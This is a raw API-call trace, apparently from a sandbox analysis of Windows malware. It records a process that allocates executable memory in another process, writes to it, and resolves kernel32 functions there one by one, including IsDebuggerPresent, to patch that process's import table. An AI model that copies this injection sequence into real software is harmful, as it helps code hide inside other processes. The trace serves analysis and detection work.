	[0197.673] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.674] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca11c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.674] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.674] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.674] lstrlenA (lpString="GetTickCount") returned 12
	[0197.674] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.674] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc18e*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc18e*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0197.675] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.675] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.675] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.675] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.675] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.676] ResetEvent (hEvent=0x498) returned 1
	[0197.676] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.676] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.676] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.676] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.676] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.676] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca120, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.676] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.677] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.677] lstrlenA (lpString="FlushFileBuffers") returned 16
	[0197.677] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.677] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc19e*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc19e*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0197.677] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.677] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.677] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.677] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.678] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.678] ResetEvent (hEvent=0x498) returned 1
	[0197.678] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.678] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.678] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.678] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.678] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.678] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca124, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.679] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.679] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.679] lstrlenA (lpString="VirtualFree") returned 11
	[0197.679] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.679] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc1b2*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc1b2*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0197.679] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.679] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.680] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.680] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.680] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.680] ResetEvent (hEvent=0x498) returned 1
	[0197.680] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.680] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.680] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.681] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.681] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.681] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca128, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.681] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.681] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.681] lstrlenA (lpString="VirtualAlloc") returned 12
	[0197.681] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.681] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc1c0*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc1c0*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0197.682] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.682] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.682] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.682] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.682] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.683] ResetEvent (hEvent=0x498) returned 1
	[0197.683] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.683] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.683] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.683] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.683] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.683] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca12c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.683] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.684] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.684] lstrlenA (lpString="GetCurrentProcess") returned 17
	[0197.684] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.684] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc1d0*, nSize=0x12, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc1d0*, lpNumberOfBytesWritten=0x12857c*=0x12) returned 1
	[0197.684] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.684] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.684] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.684] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.685] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.685] ResetEvent (hEvent=0x498) returned 1
	[0197.685] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.685] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.685] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.685] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.685] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.685] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca130, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.686] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.686] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.686] lstrlenA (lpString="SetEvent") returned 8
	[0197.686] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.686] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc1e4*, nSize=0x9, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc1e4*, lpNumberOfBytesWritten=0x12857c*=0x9) returned 1
	[0197.687] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.687] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.687] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.687] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.687] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.687] ResetEvent (hEvent=0x498) returned 1
	[0197.687] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.688] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.688] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.688] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.688] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.688] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca134, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.688] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.688] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.688] lstrlenA (lpString="ResetEvent") returned 10
	[0197.688] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.689] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc1f0*, nSize=0xb, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc1f0*, lpNumberOfBytesWritten=0x12857c*=0xb) returned 1
	[0197.689] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.689] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.689] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.689] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.689] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.690] ResetEvent (hEvent=0x498) returned 1
	[0197.690] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.690] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.690] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.690] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.690] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.690] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca138, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.691] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.691] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.691] lstrlenA (lpString="CreateEventW") returned 12
	[0197.691] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.691] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc1fe*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc1fe*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0197.691] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.691] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.691] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.691] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.692] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.692] ResetEvent (hEvent=0x498) returned 1
	[0197.692] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.692] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.692] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.692] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.692] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.692] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca13c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.693] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.693] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.693] lstrlenA (lpString="GetModuleHandleW") returned 16
	[0197.693] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.693] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc20e*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc20e*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0197.693] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.694] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.694] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.694] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.694] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.694] ResetEvent (hEvent=0x498) returned 1
	[0197.694] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.695] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.695] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.695] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.695] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.695] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca140, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.695] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.695] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.695] lstrlenA (lpString="IsDebuggerPresent") returned 17
	[0197.695] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.696] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc222*, nSize=0x12, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc222*, lpNumberOfBytesWritten=0x12857c*=0x12) returned 1
	[0197.696] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.696] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.696] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.696] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.696] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.697] ResetEvent (hEvent=0x498) returned 1
	[0197.697] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.697] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.697] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.697] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.697] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.697] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca144, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.698] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.698] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.698] lstrlenA (lpString="UnhandledExceptionFilter") returned 24
	[0197.698] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
